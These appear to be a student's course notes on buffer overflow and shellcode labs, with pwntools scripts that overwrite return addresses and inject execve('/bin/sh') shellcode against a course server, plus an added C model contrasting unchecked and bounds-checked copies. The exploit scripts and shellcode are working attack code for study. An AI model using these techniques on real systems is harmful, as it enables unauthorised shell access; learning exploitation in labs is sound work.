> # Week11 & 12 11/26 & 12/3
## `Lab 1`
### Buffer Overflow

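> * First, check what kind of file it is: it is 64 bits.
> * The program says bof, so it should be a buffer overflow problem.
> * Because a bof affects the instruction pointer's position and causes an error,
> * I tried repeatedly entering 'A' to test at what point the program's input overflows.
> * Found 24, and also added BBB to confirm that the ip has 424242, bof.
> * Now we need to offset 24 positions and point the instruction pointer at the address we want.
> * What we need to find is the shell address. After using Python we enter the shell, then see there is a flag file; cat flag gets the flag.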
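> ```python
> from pwn import *
>
> #r = process('./lab1')
> r = remote('140.134.25.138', 20001)
> r.recvline()
> input()  # pause until Enter is pressed
> #r.recvuntil('Your first challenge for bof')
> # 24 filler bytes, then the 8-byte address that replaces the return address
> r.send(b'a' * 24 + p64(0x400638))
> r.sendline(b'cat flag')  # bytes plus newline so the shell runs the command
> #print(p64(0x400638))
> r.interactive()
> ```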
> * Reference video: https://www.youtube.com/watch?v=YVlTDPhTA9U&ab_channel=JohnHammond
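
Why 24 filler bytes leave the return address intact while three extra 'B' bytes turn it into 0x424242, modelled in C next to a bounds-checked copy. This is an added example, not code from the original notes or the lab binary; the 16-byte buffer, the frame layout, `ORIGINAL_RET` and all function names are assumptions, and the model assumes little-endian x86-64.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ORIGINAL_RET 0x4005d0ULL /* constructed placeholder, not from the lab binary */

/* Assumed frame layout: 16-byte buffer, saved rbp, then the return address. */
struct frame {
    char     buf[16];
    uint64_t saved_rbp;
    uint64_t ret_addr; /* 24 bytes from the start of buf on x86-64 */
};

/* Input shaped like the probe in the notes: n_pad 'A' bytes followed by tail. */
static size_t build_input(unsigned char *out, size_t cap, size_t n_pad, const char *tail) {
    size_t t = strlen(tail);
    if (n_pad + t > cap) return 0;
    memset(out, 'A', n_pad);
    memcpy(out + n_pad, tail, t);
    return n_pad + t;
}

/* Unchecked copy, as with gets() or an oversized read(). It copies over the
 * whole struct so the model itself stays within defined behaviour. */
uint64_t ret_after_unchecked(size_t n_pad, const char *tail) {
    unsigned char in[sizeof(struct frame)];
    struct frame f = { {0}, 0, ORIGINAL_RET };
    memcpy(&f, in, build_input(in, sizeof in, n_pad, tail));
    return f.ret_addr;
}

/* Checked copy: returns -1 when the input does not fit in buf, otherwise
 * copies it and returns 0 if the return address is still intact. */
int checked_copy(size_t n_pad, const char *tail) {
    unsigned char in[sizeof(struct frame)];
    struct frame f = { {0}, 0, ORIGINAL_RET };
    size_t n = build_input(in, sizeof in, n_pad, tail);
    if (n > sizeof f.buf) return -1;
    memcpy(f.buf, in, n);
    return f.ret_addr == ORIGINAL_RET ? 0 : 1;
}

int main(void) {
    printf("24 x A       -> ret = 0x%llx\n", (unsigned long long)ret_after_unchecked(24, ""));
    printf("24 x A + BBB -> ret = 0x%llx\n", (unsigned long long)ret_after_unchecked(24, "BBB"));
    printf("checked copy of 27 bytes -> %d\n", checked_copy(24, "BBB"));
    return 0;
}
```
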
## `Lab 2`
### Shellcode

> ```python
> from pwn import *
>
> #r = process('./lab2')
> r = remote('140.134.25.138', 20002)
> context.arch = 'amd64'
> #code = shellcraft.sh()
> #asm_code = asm(code)
> # execve("/bin/sh", 0, 0): rbx holds the string "/bin/sh", 0x3b is the execve syscall number
> code = '''
> mov rbx, 0x68732f6e69622f
> push rbx
> mov rdi, rsp
> mov rsi, 0x0
> mov rdx, 0x0
> mov rax, 0x3b
> syscall
> '''
> print(code)
> asm_code = asm(code)
> print(len(asm_code))
> r.send(asm_code)
> # 24 filler bytes, then the 8-byte address 0x601060
> r.sendline(b'a' * 24 + p64(0x601060))
> r.interactive()
> ```
## `HW1`

> ```python
> from pwn import *
>
> r = remote('140.134.25.138', 25000)
> #r.recvline()
> r.send(b'a' * 40 + p64(0x400778))
> r.send(b'a' * 28 + p64(0))
> r.interactive()
> ```
## `HW2`
## `HW3`
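
```python
from pwn import *

#r = process('./hw3')
r = remote('140.134.25.138', 25002)
input()  # pause until Enter is pressed
context.arch = 'amd64'
code = shellcraft.sh()
asm_code = asm(code)
# 28 filler bytes + 4-byte 0x40 + 8 filler bytes = 40 bytes, then the 8-byte address 0x6010a0
r.send(b'a' * 28 + p32(0x40) + b'a' * 8 + p64(0x6010a0))
r.send(asm_code)
r.interactive()
```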
{"metaMigratedAt":"2023-06-15T17:18:06.226Z","metaMigratedFrom":"Content","title":"Week11 & 12 11/26 & 12/3","breaks":true,"contributors":"[{\"id\":\"a588dd8e-db19-4d00-bda1-0d4b0d40d4ff\",\"add\":4035,\"del\":1999}]"}
Lab 1
Buffer Overflow
Lab 2
Shellcode
HW1
HW2
HW3